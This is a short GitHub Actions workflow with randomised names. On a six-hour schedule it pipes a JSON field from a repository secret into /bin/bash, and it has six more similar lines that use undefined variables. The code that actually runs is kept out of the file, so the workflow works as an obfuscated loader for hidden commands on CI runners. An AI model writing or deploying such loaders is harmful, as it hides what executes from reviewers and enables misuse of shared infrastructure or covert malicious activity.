name: gangwugandian
on:
  workflow_dispatch:
  schedule:
    - cron: '3 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: gangwugandian
        env:
          m03899: ${{ secrets.m03899 }}
        run: |
          echo $m03899 | jq -r .z5 | /bin/bash
          echo $ckr4 | jq -r .eael84006 | /bin/bash
          echo $lykuv01243 | jq -r .zm35076 | /bin/bash
          echo $vm13825 | jq -r .pxnkr099 | /bin/bash
          echo $i3280 | jq -r .c85473 | /bin/bash
          echo $vaux7796 | jq -r .a0 | /bin/bash
          echo $buie3 | jq -r .n7621 | /bin/bash

